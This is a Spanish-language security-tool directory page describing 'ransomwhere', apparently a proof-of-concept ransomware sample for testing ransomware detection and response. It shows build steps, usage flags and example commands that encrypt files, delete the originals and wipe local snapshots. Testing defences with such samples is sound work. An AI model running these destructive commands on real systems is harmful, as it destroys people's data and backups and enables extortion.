Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
ransomwhere — Una muestra de ransomware PoC para probar tu estrategia de respuesta ante ransomware. | Kitploit
Herramientas/GitHubGitHub/hazcod/ransomwhere
Herramientas de Cifrado/DescifradoPost-ExplotaciónRed TeamingRespuesta a IncidentesDesarrollo de PayloadsAtaque Adversario
GitHubhazcod/ransomwhere

ransomwhere

Una muestra de ransomware PoC para probar tu estrategia de respuesta ante ransomware.

Ver Repositorio
21436hace 11 díasRevisado por Kitploit

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Ransomwhere

Una muestra de ransomware de prueba de concepto que cifra tus archivos para probar tus estrategias de detección y prevención de ransomware. Si no se proporcionan argumentos, ransomwhere ejecutará automáticamente el modo encrypt sin eliminar los archivos originales.

No me hago responsable de ningún daño causado por este software.

Compilación

root@kitploit:~
# with make and Go installed
% make build

Uso

root@kitploit:~
% ransomwhere -h
Usage of ransomwhere:
  -delete
        Delete files after encrypting.
  -log string
        The log level to use. (default "error")
  -mode string
        Encrypt or decrypt the ransomware files. (default "encrypt")
  -path string
        Path to the directory where to traverse files to ransom. (default "/Users/niels")
  -wipe
        Wipe local snapshots while encrypting.

Ejemplos

root@kitploit:~
# straight from source, encrypt in our home directory
% make FLAGS="-log=warn -delete=false -mode=encrypt"

# from the binary, encrypt /home/ransom/
% ./app -log=warn -delete=false -mode=encrypt -path=/home/ransom/

# encrypt, delete original files and wipe backups like a real ransomware (DANGEROUS)
% ./app -delete=true -wipe=true

# revert the ransom operation and restore any files
% ./app -mode=decrypt
Descargar herramienta